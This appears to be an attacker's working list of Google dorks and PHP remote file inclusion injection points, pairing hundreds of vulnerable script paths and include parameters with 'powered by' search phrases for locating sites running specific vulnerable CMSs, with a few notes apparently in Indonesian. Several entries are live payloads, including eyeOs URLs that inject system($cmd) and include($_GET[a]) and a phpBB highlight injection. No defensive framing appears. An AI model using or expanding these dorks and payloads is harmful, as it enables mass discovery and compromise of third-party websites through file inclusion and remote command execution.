  detail.php?prod= detail.php?prod="
  detail.php?prod= .php?prod="
  details.php?loc= details.php?loc=
  details.php?loc= .php?loc=
  directions.php?loc= directions.php?loc=
  direct.php?loc= direct.php?loc=
  display.php?f= display.php?f=
  display.php?file= display.php?file=
  display.php?lang= display.php?lang=
  display.php?l= display.php?l=
  display.php?ln= display.php?ln=
  display.php?pag= display.php?pag=
  display.php?page= display.php?page="
  display.php?page= .php?page="
  display.php?page=&lang= display.php?page="
  display.php?page=&lang= .php?page="
  display.php?p= display.php?p=
  display.php?pg= display.php?pg=
  display.php?s= display.php?s=
  display.php?table= display.php?table=
  display.php?table= .php?table=
  download.php?sub= "download.php?sub="
  download.php?sub= download.php?sub=
  eng.php?img= eng.php?img=
  eng.php?img= .php?img=
  /exibir.php?arquivo= .php?arquivo=
  experts.php?sub= "experts.php?sub="
  experts.php?sub= experts.php?sub=
  forum.php?seite= .php?seite=
  frag.php?exec= frag.php"
  frag.php?exec= frag.php?exec="
  frag.php?exec= .php?exec="
  frame.php?loc= .php?loc="
  galerie.php?do= .php?do="
  glossary.php?term= .php?term="
  handlinger.php?vis= .php?vis="
  /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHP Ged View
  /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHP GedView
  /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHPGedView
  /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHPGedView <= 3.3.7
  home1.php?ln= .php?ln=
  home2.php?ln= .php?ln=
  home.php?a= home.php?a="
  home.php?a= .php?a="
  home.php?act= "home.php?act="
  home.php?act= home.php?act=
  home.php?arg= .php?arg=
  home.php?func= .php?func="
  home.php?i= "home.php?i="
  home.php?i= home.php?i=
  home.php?inc= "home.php?inc="
  home.php?inc= home.php?inc=
  home.php?ln= .php?ln=
  home.php?ltr= .php?ltr="
  home.php?sit= .php?sit="
  home.php?table= .php?table=
  image.php?img= image.php?img=
  image.php?img= .php?img=
  img.php?loc= img.php?loc="
  img.php?loc= .php?loc="
  inc.php?inc= .php?inc="
  index1.php?arg= .php?arg=
  index1.php?arq= .php?arq=
  index1.php?func= .php?func="
  index1.php?inc= .php?inc="
  index1.php?lk= .php?lk="
  /index1.php?ln= .php?ln=
  index1.php?ltr= .php?ltr="
  index1.php?mid= index1.php?mid=
  index1.php?page= index1.php?page="
  index1.php?p= .php?p="
  index1.php?p= .php?pag="
  index1.php?p= .php?page="
  index1.php?p= .php?pg="
  index1.php?s= index1.php?s="
  index1.php?show= index1.php?show="
  index1.php?show= .php?show="
  index1.php?table= .php?table=
  index2.php?arg= .php?arg=
  index2.php?arq= .php?arq=
  index2.php?c= index2.php?c="
  index2.php?c= .php?c="
  index2.php?cont= index2.php?cont="
  index2.php?cont= .php?cont="
  index2.php?content= index2.php?cont="
  index2.php?content= index2.php?content="
  index2.php?content= .php?content="
  index2.php?content= index2.php?content=
  index2.php?content= .php?content=
  index2.php?i= /index2.php?i=
  index2.php?inc= .php?inc="
  index2.php?l= .php?l="
  index2.php?lg= index.php?lg="
  index2.php?lk= .php?lk="
  index2.php?ln= index.php?ln="
  index2.php?ln= .php?ln="
  index2.php?lng= index.php?lng="
  index2.php?loca= index2.php?loca=
  index2.php?loca= .php?loca=
  index2.php?meio= .php?meio=
  index2.php?s= index2.php?s="
  index2.php?s= .php?s="
  index2.php?table= .php?table=
  index2.php?x= index2.php?x=
  index2.php?x= .php?x=
  index.php3?act= index.php3?act=
  index.php3?act= .php3?act=
  index.php3?act= .php3?act="
  index.php3?file= .php3?f="
  index.php3?file= .php3?file="
  index.php3?id= index.php3?id=
  index.php3?i= index.php3?i=
  index.php3?lang= index.php3?lang=
  index.php3?l= index.php3?l=
  index.php3?page= index.php3?page=
  index.php3?pag= index.php3?pag=
  index.php3?p= index.php3?p="
  index.php3?p= index.php3?pag="
  index.php3?p= index.php3?page="
  index.php3?p= index.php3?pg="
  index.php3?pg= index.php3?pg=
  index.php3?p= index.php3?p=
  index.php3?s= index.php3?s="
  index.php3?s= index.php3?s=
  index.php3?s= .php3?s=
  index.php3?s= .php3?s="
  index.php4?lang= index.php4?lang="
  index.php4?lang= index.php4?lang="
  index.php4?lang= .php4?lang=
  index.php4?lang= .php4?lang="
  index.php4?lang= .php4?lang=
  index.php5?lang= index.php5?lang="
  index.php5?lang= index.php5?lang=
  index.php5?lang= .php5?lang="
  index.php?a= index.php?a="
  index.php?a= .php?a="
  index.php?acao= index.php?acao=
  index.php?acao= .php?acao=
  index.php?act= "index.php?act="
  index.php?act= index.php?act=
  index.php?action= index.php?action="
  index.php?action= .php?action="
  index.php?arg= index.php?arg=
  index.php?arg= .php?arg=
  index.php?arq= index.php?arq=
  index.php?arq= .php?arq=
  index.php?arquivo= .php?arquivo=
  index.php?ba= index.php?ba="
  index.php?b= index.php?b="
  index.php?bas= index.php?bas="
  index.php?bas= .php?bas="
  index.php?cal= index.php?cal=
  index.php?cal= "index.php?cal="
  index.php?cal= ".php?cal="
  index.php?c= index.php?c="
  index.php?cal= .php?cal=
  index.php?c= index.php?c=
  index.php?c= "index.php?c="
  index.php?c= ".php?c="
  /index.php?cms= /index.php?cms=
  /index.php?cms= /index.php?cms="
  index.php?command= index.php?command="
  index.php?command= .php?command="
  index.php?content= index.php?content=
  index.php?content= .php?content=
  index.php?c= .php?c=
  index.php?d1= .php?d1="
  index.php?def= index.php?def="
  index.php?def= .php?def="
  index.php?def= index.php?def=
  /index.php?dn= /index.php?dn=
  /index.php?dn= index.php?dn="
  /index.php?dn= .php?dn=
  /index.php?dn= .php?dn="
  index.php?dok= index.php?dok="
  index.php?dok= .php?dok="
  index.php?e= index.php?e="
  index.php?exec= index.php?exec=
  index.php?exec= .php?exec=
  index.php?f1= .php?f1="
  index.php?f= index.php?f="
  index.php?fase= index.php?fase="
  index.php?fase= .php?fase="
  index.php?file= index.php?file="
  index.php?fn= index.php?fn="
  index.php?fn= .php?fn="
  index.php?fPage= index.php?fPage="
  index.php?fPage= index.php?fPage=
  index.php?fPage= .php?fPage=
  index.php?fPage= .php?fPage="
  index.php?fPage= index.php?fPage=
  index.php?fset= .php?fset="
  index.php?func= .php?func="
  index.php?goto= index.php?goto="
  index.php?goto= .php?goto="
  index.php?id=1&lang= index.php?i=
  index.php?id=1&lang= "index.php?id="
  index.php?id=1&lang= index.php?id=
  index.php?id=1&lang= ".php?id="
  index.php?id= index.php?id="
  /index.php?id=&lang= index.php?id="
  /index.php?id=&lang= .php?id="
  index.php?id=&lang= "index.php?id="
  index.php?id=&lang= ".php?id="
  /index.php?id=&page= index.php?id="
  /index.php?id=&page= .php?id="
  index.php?inc= .php?inc="
  index.php?ir= ".php?ir="
  /index.php?lang=en&cat= index.php?lang="
  /index.php?lang=en&cat= .php?lang="
  /index.php?lang=en&page= index.php?lang="
  /index.php?lang=en&page= .php?lang="
  /index.php?lang=en&page= index.php?lang=
  index.php?lang=en&page= index.php?lang=
  /index.php?lang=en&page= .php?lang=
  index.php?lang=en&page= .php?lang=
  index.php?lang= "index.php?lang="
  index.php?lang= index.php?lang=
  index.php?lang=&page= index.php?lang=
  index.php?lang=&page= .php?lang=
  index.php?lg= "index.php?lg="
  index.php?lg= index.php?lg=
  index.php?lk= .php?lk="
  /index.php?ln= .php?ln=
  index.php?lng= "index.php?lng="
  index.php?lng= index.php?lng=
  index.php?ln= "index.php?ln="
  index.php?ln= index.php?ln=
  index.php?ln= ".php?ln="
  index.php?lnk= index.php?lnk=
  index.php?lnk= .php?lnk=
  index.php?lnk= "index.php?lnk="
  index.php?lnk= ".php?lnk="
  index.php?ln= .php?ln=
  index.php?loca= index.php?loca=
  /index.php?loc= .php?loc="
  index.php?loca= .php?loca=
  /index.php?loc=&cat= index.php?loc="
  /index.php?loc=&cat= .php?loc="
  /index.php?loc=&lang= index.php?loc="
  /index.php?loc=&lang= .php?loc="
  /index.php?loc=&page= index.php?loc="
  /index.php?loc= .php?loc=
  /index.php?loc=start&page= index.php?loc="
  index.php?ltr= index.php?ltr="
  index.php?ltr= .php?ltr="
  index.php?main= .php?main="
  index.php?m= index.php?m="
  index.php?meio= index.php?meio="
  index.php?meio= index.php?meio=
  index.php?meio= .php?meio=
  index.php?meio= .php?meio="
  index.php?mf= index.php?mf=
  index.php?mf= .php?mf=
  index.php?mf= .php?mf="
  index.php?mid= index.php?mid="
  index.php?mid= index.php?mid=
  index.php?mid= .php?mid=
  index.php?mid= .php?mid="
  index.php?middle= index.php?middle="
  index.php?middle= index.php?middle=
  index.php?middle= .php?middle="
  index.php?mn= index.php?mn="
  index.php?mn= .php?mn="
  index.php?mod= index.php?mod="
  index.php?mod= .php?mod="
  index.php?new= index.php?new="
  index.php?news= index.php?news="
  index.php?page1= index.php?page1="
  index.php?page1= .php?page1="
  index.php?page= php5?page=
  index.php?page= index.php?page=
  index.php?page=&lang= index.php?p=
  index.php?page=&lang= index.php?pag=
  index.php?page=&lang= index.php?page=
  index.php?page=&lang= index.php?pg=
  index.php?page=&lang= .php?p=
  index.php?page=&lang= .php?pag=
  index.php?page=&lang= .php?page=
  index.php?page=&lang= .php?pg=
  index.php?pageN= .php?pageN="
  index.php?pager= index.php?pager=
  index.php?pager= .php?pager=
  index.php?pagina= index.php?pagina=
  index.php?pag= "index.php?pag="
  index.php?pag= index.php?pag=
  index.php?p= index.php?p="
  index.php?pg= "index.php?pg="
  index.php?pg= index.php?pg=
  index.php?prod= .php?prod="
  index.php?prod= .php?product="
  index.php?product= .php?prod="
  index.php?product= .php?product="
  index.php?r= index.php?r="
  index.php?s= index.php?s="
  index.php?s= index.php?s=
  index.php?s= .php?s=
  index.php?s= .php?s="
  index.php?secao= index.php?secao=
  index.php?secao= .php?secao=
  index.php?secao= "index.php?secao="
  index.php?secao= ".php?secao="
  /index.php?seccion= /index.php?seccion=
  /index.php?seccion= .php?seccion=
  index.php?sec= "index.php?sec="
  index.php?sec= index.php?sec=
  /index.php?seite= /index.php?seite=
  /index.php?seite= .php?seite=
  index.php?select= .php?select="
  index.php?select= index.php?select=
  index.php?select= .php?select=
  index.php?set= index.php?set="
  index.php?set= index.php?set=
  index.php?set= .php?set=
  index.php?set= .php?set="
  index.php?sf= index.php?sf="
  index.php?show= .php?show="
  index.php?s= "index.php?s="
  index.php?s= index.php?s=
  index.php?sit= index.php?sit="
  index.php?sit= .php?sit="
  /index.php?slang= /index.php?slang=
  /index.php?slang= "index.php?slang="
  /index.php?slang= .php?slang=
  /index.php?slang= ".php?slang="
  index.php?sort= .php?sort="
  index.php?spage= index.php?spage="
  index.php?spage= index.php?spage=
  index.php?spage= .php?spage=
  index.php?spage= .php?spage="
  index.php?ss= index.php?ss="
  index.php?ss= .php?ss="
  index.php?st= index.php?st="
  index.php?sub= index.php?sub="
  index.php?sub= index.php?sub=
  index.php?sub= .php?sub=
  index.php?sub= "index.php?sub="
  index.php?sub= index.php?sub=
  index.php?sub= "index.php?sub=""
  index.php?sub= "index.php?sub="
  index.php?sub= ".php?sub="
  index.php?subpage= index.php?subpage="
  index.php?subpage= .php?subpage="
  index.php?subp= index.php?subp="
  index.php?subp= .php?subp="
  index.php?table= index.php?table=
  index.php?table= .php?table=
  index.php?t= index.php?t="
  index.php?task= index.php?task=
  index.php?task= .php?task=
  index.php?term= .php?term="
  index.php?textfield= .php?textfield="
  index.php?theme= index.php?theme=
  index.php?theme= .php?theme=
  index.php?theme= .php?theme=
  index.php?trans= index.php?trans="
  index.php?trans= .php?trans="
  index.php?v= index.php?v="
  index.php?ver= index.php?ver="
  index.php?ver= index.php?ver=
  index.php?ver= .php?ver=
  index.php?ver= .php?ver="
  index.php?ver= .php?ver=
  /index.php?vis= /index.php?vis=
  /index.php?vis= .php?vis=
  index.php?way= index.php?way=
  index.php?way= .php?way=
  index.php?wpage= index.php?wpage="
  index.php?wpage= .php?wpage="
  info.php?ln= info.php?ln="
  info.php?ln= info.php?ln=
  info.php?ln= .php?ln="
  /interna.php?meio= .php?meio="
  kalender.php?vis= kalender.php"
  kalender.php?vis= kalender.php?vis="
  kalender.php?vis= .php?vis="
  lang.php?arg= .php?arg=
  lang.php?arq= .php?arq=
  lang.php?lk= .php?lk="
  lang.php?ln= .php?ln=
  lang.php?subpage= .php?subpage="
  lang.php?subp= .php?sub="
  lang.php?subp= .php?subp="
  /lib/db/ez_sql.php?lib_path= ttCMS
  /lib/db/ez_sql.php?lib_path= ttCMS <= v4
  /lib/static/header.php?set_menu= iPhoto Album
  /lib/static/header.php?set_menu= iPhotoAlbum
  /lib/static/header.php?set_menu= iPhotoAlbum v1.1
  link.php?do= .php?do="
  list.php?product= .php?product=
  list.php?table= .php?table=
  ln.php?ln= .php?ln=
  loc.php?l= .php?l="
  loc.php?l= .php?loc="
  loc.php?lang= .php?lang="
  loc.php?lang= .php?loc="
  loc.php?loc= loc.php?loc="
  loc.php?loc= .php?loc="
  login.php?loca= .php?loca=
  magazine.php?inc= .php?inc="
  main1.php?arg= .php?arg=
  main1.php?ln= .php?ln=
  main2.php?ln= .php?ln=
  main.html.php?seite= .php?seite=
  main.php3?act= main.php3?act="
  main.php3?act= .php3?act="
  main.php5?page= .php5?id=
  main.php?a= .php?a="
  main.php?arg= .php?arg=
  main.php?ba= main.php?ba="
  main.php?ba= .php?ba="
  main.php?command= main.php?command="
  main.php?command= .php?command="
  main.php?d1= main.php?d1="
  main.php?d1= .php?d1="
  main.php?f1= .php?f1="
  main.php?fset= .php?fset="
  main.php?inc= .php?inc="
  main.php?ln= .php?ln=
  main.php?ltr= .php?ltr="
  main.php?s= main.php?s="
  main.php?s= main.php?s=
  main.php?s= .php?s=
  main.php?s= .php?s="
  main.php?sit= .php?sit="
  main.php?table= .php?table=
  main.php?vis= main.php?vis="
  main.php?vis= main.php?vis=
  main.php?vis= .php?vis="
  mai.php?act= mai.php?act="
  mai.php?act= mai.php?act=
  mai.php?loc= mai.php?loc="
  mai.php?loc= mai.php?loc=
  mai.php?src= mai.php?src="
  mai.php?src= mai.php?src=
  map.php?loc= map.php?loc=
  middle.php?file= "middle.php?file="
  middle.php?file= "middle.php?page="
  middle.php?file= ".php?file="
  middle.php?file= ".php?page="
  middle.php?file= middle.php?file=
  middle.php?file= middle.php?page=
  middle.php?file= .php?file=
  middle.php?file= .php?page=
  middle.php?page= "middle.php?page="
  middle.php?page= ".php?page="
  middle.php?page= middle.php?page=
  middle.php?page= .php?page=
  misc.php?do= .php?do="
  mod.php?mod= mod.php?mod="
  mod.php?mod= .php?mod="
  module.php?mod= module.php?mod="
  module.php?mod= .php?mod="
  /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook"
  /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook"
  /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook 0.6.1"
  /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook
  /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook 0.6.1
  modul.php?mod= modul.php?mod="
  modul.php?mod= .php?mod="
  more.php?sub= "more.php?sub="
  more.php?sub= more.php?sub=
  nav.php?g= "nav.php?g="
  nav.php?g= nav.php?g=
  nav.php?go= "nav.php?go="
  nav.php?go= nav.php?go=
  nav.php?lk= .php?lk="
  nav.php?ln= .php?ln=
  nav.php?loc= nav.php
  nav.php?loc= nav.php?loc=
  nav.php?loc= .php?loc=
  nav.php?nav= "nav.php?nav="
  nav.php?nav= nav.php?nav=
  nav.php?page= "nav.php?page="
  nav.php?page= nav.php?page=
  nav.php?pagina= "nav.php?pagina="
  nav.php?pagina= nav.php?pagina=
  nav.php?pag= "nav.php?pag="
  nav.php?pag= nav.php?pag=
  nav.php?pg= "nav.php?pg="
  nav.php?pg= nav.php?pg=
  nav.php?p= "nav.php?p="
  nav.php?p= nav.php?p=
  order.php?lang= order.php?lang=
  order.php?list= order.php?list=
  order.php?ln= order.php?ln=
  order.php?l= order.php?l=
  order.php?page= order.php?page=
  order.php?pag= order.php?pag=
  order.php?pg= order.php?pg=
  order.php?p= order.php?p=
  order.php?wp= order.php?wp=
  order.php?wp= .php?wp=
  /?page= .php5?id=
  page.php5?id= page.php5?id=
  page.php5?id= .php5?id=
  page.php?arq= .php?arq=
  page.php?ln= .php?ln=
  page.php?p= page.php?p="
  page.php?p= page.php?p=
  page.php?p= .php?p=
  page.php?p= .php?p="
  page.php?s= page.php?s="
  page.php?s= page.php?s=
  page.php?s= .php?s=
  page.php?s= .php?s="
  /?pag= .php5?id=
  /palportal/index.php?page= /palportal/
  /palportal/index.php?page= pal portal
  /?pg= .php5?id=
  /?p= .php5?id=
  p.php?p= .php?p=
  p.php?p= .php?p="
  p.php?p= p.php?p="
  p.php?p= "p.php?p="
  p.php?p= p.php?p=
  presse.php?do= .php?do="
  presse.php?do= presse.php?do="
  print.php?pager= .php?pager=
  print.php?pager= .php?pager=
  print.php?pager= print.php?pager=
  print.php?table= .php?table=
  proddetail.php?prod= .php?prod="
  prod.php?prod= .php?prod="
  products.php?prod= .php?prod="
  produit.php?prod= .php?prod="
  produkt.php?prod= .php?prod="
  /read.php?fpage= /read.php?fpage=
  reports.php?sub= "reports.php?sub="
  reports.php?sub= reports.php?sub=
  rss.php?phpraid_dir= phpraid"
  rss.php?phpraid_dir= phpraid
  rss.php?phpraid_dir= ""$2-"
  rss.php?phpraid_dir= "php raid"
  rss.php?phpraid_dir= php raid
  rss.php?phpraid_dir= phpraid
  s1.php?ln= .php?ln=
  search.php?exec= search.php?exec=
  shop.php?prod= .php?prod="
  shop.pl/page= shop.pl/page=
  show.php?page1= .php?page1="
  show.php?product= .php?product=
  show.php?product= show.php?product=
  side.php?arq= .php?arq=
  side.php?table= .php?table=
  side.php?vis= .php?vis=
  side.php?vis= side.php?vis=
  site.php?arq= .php?arq=
  site.php?meio= .php?meio=
  site.php?table= .php?table=
  s.php?table= .php?table=
  start.php?id= .php?id="
  start.php?id= start.php?id="
  start.php?id= start.php?id=
  start.php?lang= .php?lang="
  start.php?lang= start.php?lang="
  start.php?lang= start.php?lang=
  start.php?lang= .php?lang=
  start.php?lang= start.php?lang=
  start.php?mod= .php?mod="
  start.php?mod= start.php?mod="
  start.php?page= .php?page="
  start.php?page= start.php?page="
  start.php?page= start.php?page=
  start.php?pag= start.php?pag=
  start.php?pg= start.php?pg=
  start.php?p= start.php?p=
  start.php?s= .php?s="
  start.php?s= start.php?s="
  start.php?s= start.php?s=
  start.php?s= start.php?s=
  str.php?lang= str.php?lang=
  str.php?ln= str.php?ln=
  str.php?l= str.php?l=
  str.php?page= str.php?page=
  str.php?p= str.php?p=
  sub.php?menu= "sub.php?menu="
  sub.php?menu= sub.php?menu=
  sub.php?s= "sub.php?s="
  sub.php?s= sub.php?s=
  sub.php?sub= "sub.php?sub="
  sub.php?sub= sub.php?sub=
  task.php?task= .php?task=
  task.php?task= task.php?task=
  /templates/mangobery/footer.sample.php?Site_Path= Mangobery
  /templates/mangobery/footer.sample.php?Site_Path= Mangobery 0.5.5
  /templates/mangobery/footer.sample.php?Site_Path= Mangobery-0.5.5
  trans.php?trans= .php?trans="
  trans.php?trans= trans.php?trans="
  /trans/trans.php?trans=eng&page= .php?trans="
  /trans/trans.php?trans=en&page= .php?trans="
  /trans/trans.php?trans=fr&page= .php?trans="
  /trans/trans.php?trans=ko&page= .php?trans="
  /trans/trans.php?trans=&page= .php?trans="
  /trans/trans.php?trans=&p= .php?trans="
  view.php?sub= "view.php?sub="
  view.php?sub= view.php?sub=
  view.php?table= .php?table=
  voir.php?inc= .php?inc="
  werbungFrame.php?do= .php?do="
  /ws/get_events.php?includedir= Web Calendar
  /ws/get_events.php?includedir= WebCalendar
  /ws/get_events.php?includedir= WebCalendar v0.9.45
  /ws/get_reminders.php?includedir= WebCalendar
  /ws/get_reminders.php?includedir= WebCalendar v0.9.45
  /ws/login.php?includedir= WebCalendar
  /ws/login.php?includedir= WebCalendar v0.9.45
  ocp-103/index.php?req_path= ocPortal
  images/evil.php?owned= e107
  /modules/My_eGery/public/displayCategory.php?basepath=
  /include/new-visitor.inc.php?lvc_include_dir=
  /_functions.php?prefix=
  /cpcommerce/_functions.php?prefix=
  /modules/coppermine/themes/default/theme.php?THEME_DIR=
  /eblog/blog.inc.php?xoopsConfig[xoops_url]=
  /pm/lib.inc.php?pm_path=
  /b2-tools/gm-2-b2.php?b2inc=
  /modules/mod_mainmenu.php?mosConfig_absolute_path=
  /modules/agendax/addevent.inc.php?agendax_path=
  /includes/include_once.php?include_file=
  /e107/e107_handlers/secure_img_render.php?p=
  /shoutbox/expanded.php?conf=
  /main.php?x=
  /myPHPCalendar/admin.php?cal_dir=
  /index.php/main.php?x=
  /index.php?include=
  /index.php?x=
  /index.php?open=
  /index.php?visualizar=
  /template.php?pagina=
  /index.php?pagina=
  /index.php?inc=
  /includes/include_onde.php?include_file=
  /index.php?page=
  /index.php?pg=
  /index.php?show=
  /db.php?path_local=
  /index.php?site=
  /htmltonuke.php?filnavn=
  /livehelp/inc/pipe.php?HCL_path=
  /hcl/inc/pipe.php?HCL_path=
  /inc/pipe.php?HCL_path=
  /support/faq/inc/pipe.php?HCL_path=
  /help/faq/inc/pipe.php?HCL_path=
  /helpcenter/inc/pipe.php?HCL_path=
  /live-support/inc/pipe.php?HCL_path=
  /gnu3/index.php?doc=
  /gnu/index.php?doc=
  /phpgwapi/setup/tables_update.inc.php?appdir=
  /forum/inst.php?phpbb_root_dir=
  /includes/calendar.php?phpc_root_path=
  /includes/setup.php?phpc_root_path=
  /inc/authform.inc.php?path_pre=
  /include/authform.inc.php?path_pre=
  index.php?sec=
  index.php?filename=
  index.php?dir=
  index.php?document=
  index.php?view=
  *.php?sel=
  *.php?session=&content=
  *.php?locate=
  *.php?place=
  *.php?layout=
  *.php?go=
  *.php?catch=
  *.php?mode=
  *.php?name=
  *.php?loc=
  *.php?f=
  *.php?inf=
  *.php?pg=
  *.php?load=
  *.php?naam=
  /index.php?page= site:*.dk
  /index.php?file= site:*.dk
  INURL OR INURL WITH:
  /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
  /includes/header.php?systempath=
  /Gery/displayCategory.php?basepath=
  /index.inc.php?PATH_Includes=
  /ashnews.php?pathtoashnews=
  /ashheadlines.php?pathtoashnews=
  /demo/includes/init.php?user_inc=
  /jaf/index.php?show=
  /inc/shows.inc.php?cutepath=
  /poll/admin/common.inc.php?base_path=
  /pollvote/pollvote.php?pollname=
  /sources/post.php?fil_config=
  /bb_lib/checkdb.inc.php?libpach=
  /include/livre_include.php?no_connect=lol&chem_absolu=
  /index.php?from_market=Y&pageurl=
  /pivot/modules/module_db.php?pivot_path=
  /derniers_commentaires.php?rep=
  /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
  /coppermine/themes/maze/theme.php?THEME_DIR=
  /mylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
  /mylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
  /agendax/addevent.inc.php?agendax_path=
  /modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=
  /default.php?page=
  /index.php?action=
  /index1.php?p=
  /index2.php?x=
  /index2.php?content=
  /index.php?conteudo=
  /index.php?cat=
  /modules/xgery/upgrade_album.php?GERY_BASEDIR=
  /library/editor/editor.php?root=
  /library/lib.php?root=
  /zentrack/index.php?configFile=
  /becommunity/community/index.php?pageurl=
  /GradeMap/index.php?page=
  /index4.php?body=
  /side/index.php?side=
  /es/index.php?action=
  /index.php?main=
  /html/page.php?page=
  /page.php?view=
  /index.php?menu=
  /content.php?page=
  /main_site.php?page=
  /index.php?L2=
  /main.php?page=
  /tutorials/print.php?page=
  /index.php?inter_url=
  /index2.php?menu=
  /index.php?level=
  /index1.php?main=
  /index1.php?nav=
  /index1.php?link=
  /index2.php?page=
  /index.php?myContent=
  /index.php?TWC=
  /index.php?sec=
  /index.php?babInstPath=
  /main.php?body=
  /index.php?z=
  /main.php?view=
  /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
  /index.php?file=
  1. my_egery site:.org
  2. xgery site:.org
  3. coppermine site:.org
  4. 4nAlbum site:.org
  /modules/4nAlbum/public/displayCategory.php?basepath=
  5. inurlP:NphpBB2 site:.org
  6. ihm.php?p=
  7. Keyword : "powered by MyLinks"
  8. /modules.php?name=myguests
  /modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  9. /Popper/index.php?
  /Popper/index.php?childwindow.inc.php?form=
  10. google = kietu/hit_js.php, kietu/hit_js.php
  yahoo = by Kietu? v 3.2
  /kietu/index.php?kietu[url_hit]=
  11. keyword : "Powered by phpBB 2.0.6"
  /html&highlight=%2527.include($_GET[a]),exit.%2527&a=
  12. keyword : "powered by CubeCart 3.0.6"
  13. keyword : "powered by paBugs 2.0 Beta 3"
  14. powered by AshNews", AshNews atau  /ashnews.php
  15. keyword : /phorum/login.php
  /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
  16. ihm.php?p=*
  14. keyword : "powered eyeOs"
  /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
  diganti dengan :
  /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=
  15. .php?bodyfile=
  16. /includes/orderSuccess.inc.php?glob=
  17. forums.html
  /modules.php?name=
  18. /default.php?page=home
  19. /folder.php?id=
  20. main.php?pagina=
  /paginedinamiche/main.php?pagina=
  21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( *.edu.*/modules.php?name=myguests ) or ( "powered by MyGuests")
  22. application.php?base_path=
  /application.php?base_path=
  23. inurlp:hplivehelper
  /phplivehelper/initiate.php?abs_path=
  24. inurlp:hpnuke
  25. key word : "powered by Fantastic News v2.1.2"
  /archive.php?CONFIG[script_path]=
  26. keyword: "powered by smartblog" AND ?page=login
  27. /forum/
  /forum/admin/index.php?inc_conf=
  28. keyword:"Powered By FusionPHP"
  /templates/headline_temp.php?nst_inc=
  29. shoutbox/expanded.php filetypep:hp
  30.  /osticket/
  /osticket/include/main.php?config[search_disp]=true&include_dir=
  31. keyword : "Powered by iUser"
  /common.php?include_path=
  32.  "static.php?load="
  /static.php?load=
  33. keyworld : /phpcoin/login.php
  /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
  34. keyworld: /phpGedview/login.php site:
  /help_text_vars.php?dir&PGV_BASE_DIRECTORY=
  35. /folder.php?id=
  /classes.php?LOCAL_PATH=
  "/lire.php?rub="
  "/os/pointer.php?url="
  "folder.php?id="
  "show.php?page="
  "index2.php?DoAction="
  "index.php?canal="
  "index.php?screen="
  "index.php?langc="
  "index.php?Language="
  "view.php?page="
  dork: "powered by doodle cart"
  rfi of this dork: enc/content.php?Home_Path=
  dork: "Login to Calendar"
  rfi of this dork: /embed/day.php?path=
  dork: "powered by EQdkp"
  rfi of this dork: /includes/dbal.php?eqdkp_root_path=
  "template.php?goto="
  "video.php?content="
  "pages.php?page="
  "index1.php?choix="
  "index1.php?menu="
  "index2.php?ascii_seite="
  dork: surveys
  rfi to this dork: /surveys/survey.inc.php?path=
  "index.php?body="
  dork: adobt sitel
  rfi to this dork: /classes/adodbt/sql.php?classes_dir=
  dork: "Powered By ScozNews"
  rfi to this dork: /sources/functions.php?CONFIG[main_path]=
  rfi to this dork: /sources/template.php?CONFIG[main_path]=
  "kb_constants.php?module_root_path="
  dork: mcf.php"
  rfi to this dork: /mcf.php?content=
  dork: "main.php?sayfa="
  rfi to this dork: /main.php?sayfa=
  dork: "MobilePublisherPHP"
  rfi to this dork: /header.php?abspath=
  dork: "powered by phpCOIN 1.2.3"
  rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
  login.php?dir=
  "index.php?go="
  "index1.php?="
  "lib/gore.php?libpath="
  "index2.php?p="
  /classes/adodbt/sql.php?classes_dir=
  /classified_right.php?language_dir=
  /sources/template.php?CONFIG[main_path]=
  /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
  /mcf.php?content=
  /zipndownload.php?PP_PATH=
  /administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=
  impex/ImpExData.php?systempath=
  /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
  /login.php?dir=
  /tags.php?BBCodeFile=
  phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=
  index1.php?=
  main.php?id=
  lib/gore.php?libpath=
  news_detail.php?file=
  old_reports.php?file=
  index.php?nic=
  homepage.php?sel=
  index.php?sel=
  components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
  main.php?pagina=
  test.php?page=
  index.php?lang=
  index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
  index.php?mode=
  index.php?stranica=
  index.php?sub=
  index.php?t=
  solpot.html?body=
  administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
  /tools/send_reminders.php?includedir=
  administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
  index.php?u=
  administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
  administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
  /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
  administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
  show_news.php?cutepath=
